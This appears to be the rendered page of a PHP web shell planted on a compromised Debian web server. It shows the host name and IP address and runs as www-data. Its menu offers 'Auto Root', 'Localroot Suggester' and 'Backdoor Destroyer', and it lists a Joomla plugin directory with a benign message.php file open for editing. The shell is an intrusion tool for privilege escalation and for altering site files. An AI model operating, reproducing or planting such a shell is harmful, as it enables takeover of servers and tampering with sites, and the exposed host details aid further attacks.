Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
plugins /
system /
jqueryeasy /
fields /
Delete
Unzip
Name
Size
Permission
Date
Action
themes
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
bootstrapselect.php
1.13
KB
-rwxr-xr-x
2026-06-10 18:30
bootstrapversion.php
1.95
KB
-rwxr-xr-x
2026-06-10 18:30
captionradio.php
3.91
KB
-rwxr-xr-x
2026-06-10 18:30
cdnlinks.php
3.5
KB
-rwxr-xr-x
2026-06-10 18:30
dynamicsingleselectjqe.php
7.07
KB
-rwxr-xr-x
2026-06-10 18:30
extensionauthor.php
1015
B
-rwxr-xr-x
2026-06-10 18:30
extensionconnect.php
1.37
KB
-rwxr-xr-x
2026-06-10 18:30
extensionlink.php
5.12
KB
-rwxr-xr-x
2026-06-10 18:30
extensiontranslators.php
1.19
KB
-rwxr-xr-x
2026-06-10 18:30
extensionversion.php
1.09
KB
-rwxr-xr-x
2026-06-10 18:30
index.html
44
B
-rwxr-xr-x
2026-06-10 18:30
jchoptimizetest.php
1.14
KB
-rwxr-xr-x
2026-06-10 18:30
jquerymobileversion.php
1.4
KB
-rwxr-xr-x
2026-06-10 18:30
jqueryselect.php
1.37
KB
-rwxr-xr-x
2026-06-10 18:30
jqueryuithemeselect.php
3.36
KB
-rwxr-xr-x
2026-06-10 18:30
jqueryuiversion.php
3.01
KB
-rwxr-xr-x
2026-06-10 18:30
jqueryversion.php
2.42
KB
-rwxr-xr-x
2026-06-10 18:30
link.php
1.83
KB
-rwxr-xr-x
2026-06-10 18:30
message.php
4.55
KB
-rwxr-xr-x
2026-06-10 18:30
migrateselect.php
1.71
KB
-rwxr-xr-x
2026-06-10 18:30
migrateversion.php
2.89
KB
-rwxr-xr-x
2026-06-10 18:30
mootoolsversion.php
1.35
KB
-rwxr-xr-x
2026-06-10 18:30
subtitle.php
2.01
KB
-rwxr-xr-x
2026-06-10 18:30
sywextensionpresencetest.php
5.1
KB
-rwxr-xr-x
2026-06-10 18:30
sywonlinehelp.php
1.99
KB
-rwxr-xr-x
2026-06-10 18:30
sywprefixedtext.php
2.55
KB
-rwxr-xr-x
2026-06-10 18:30
templates.php
1.3
KB
-rwxr-xr-x
2026-06-10 18:30
themes.php
817
B
-rwxr-xr-x
2026-06-10 18:30
title.php
2.52
KB
-rwxr-xr-x
2026-06-10 18:30
Save
Rename
<?php /** * @copyright Copyright (C) 2011 Simplify Your Web, Inc. All rights reserved. * @license GNU General Public License version 3 or later; see LICENSE.txt */ defined('_JEXEC') or die ; jimport('joomla.form.formfield'); class JFormFieldMessage extends JFormField { public $type = 'Message'; protected $message_type; protected $message; protected $badge_type; protected $badge; protected function getLabel() { $html = ''; $lang = JFactory::getLanguage(); $lang->load('plg_system_jqueryeasy.sys', JPATH_SITE); if ($this->message_type == 'example') { $html .= '<label style="visibility: hidden; margin: 0">'.JText::_('PLG_SYSTEM_JQUERYEASY_EXAMPLE_EXAMPLE_LABEL').'</label>'; } else if ($this->message_type == 'fieldneutral' || $this->message_type == 'fieldwarning' || $this->message_type == 'fielderror' || $this->message_type == 'fieldinfo') { if ($this->badge) { return '<span class="label label-' . $this->badge_type . '">' . $this->badge . '</span><br />' . parent::getLabel(); } else { return parent::getLabel(); } } else { $html .= '<div style="clear: both;"></div>'; } return $html; } protected function getInput() { $html = ''; $lang = JFactory::getLanguage(); $lang->load('plg_system_jqueryeasy.sys', JPATH_SITE); $message_label = ''; if ($this->element['label']) { $message_label = $this->translateLabel ? JText::_(trim($this->element['label'])) : trim($this->element['label']); } if ($this->message_type == 'example') { if ($message_label) { $html .= '<span class="label">'.$message_label.'</span> '; } else { $html .= '<span class="label">'.JText::_('PLG_SYSTEM_JQUERYEASY_EXAMPLE_EXAMPLE_LABEL').'</span> '; } if ($this->message) { $html .= '<span class="muted" style="font-size: 0.8em;">' . JText::_($this->message) . '</span>'; } } else { $style = ''; $style_label = ''; switch ($this->message_type) { case 'warning': case 'fieldwarning': $style = 'warning'; $style_label = 'warning'; break; case 'error': case 'fielderror': $style = 'error'; $style_label = 'important'; break; case 'info': case 'fieldinfo': $style = 'info'; $style_label = 'info'; break; case 'neutral': break; case 'fieldneutral': $style = 'neutral'; break; default: $style = 'success'; $style_label = 'success'; /* message, success */ } $class_attribute = ''; if ($style) { $class_attribute = ' class="alert alert-' . $style . '"'; } $html .= '<div style="margin-bottom: 0"' . $class_attribute . '>'; if ($message_label && $this->message_type != 'fieldneutral' && $this->message_type != 'fieldwarning' && $this->message_type != 'fielderror' && $this->message_type != 'fieldinfo') { if ($message_label == 'Pro') { $style_label = 'important'; } if ($style_label) { $style_label = ' label-'.$style_label; } $html .= '<span class="label' . $style_label . '">' . $message_label . '</span> '; } if ($this->message) { $style_attribute = ''; if ((isset($message_label) && $message_label == 'Pro') || $this->badge == 'Pro') { $style_attribute = ' style="font-style: italic"'; } $html .= '<span' . $style_attribute . '>' . JText::_($this->message) . '</span>'; } $html .= '</div>'; } return $html; } public function setup(SimpleXMLElement $element, $value, $group = null) { $return = parent::setup($element, $value, $group); if ($return) { $this->message_type = isset($this->element['style']) ? trim($this->element['style']) : 'info'; $this->message = isset($this->element['text']) ? trim($this->element['text']) : ''; $this->badge_type = isset($this->element['badgetype']) ? trim($this->element['badgetype']) : 'important'; $this->badge = isset($this->element['badge']) ? trim($this->element['badge']) : ''; } return $return; } } ?>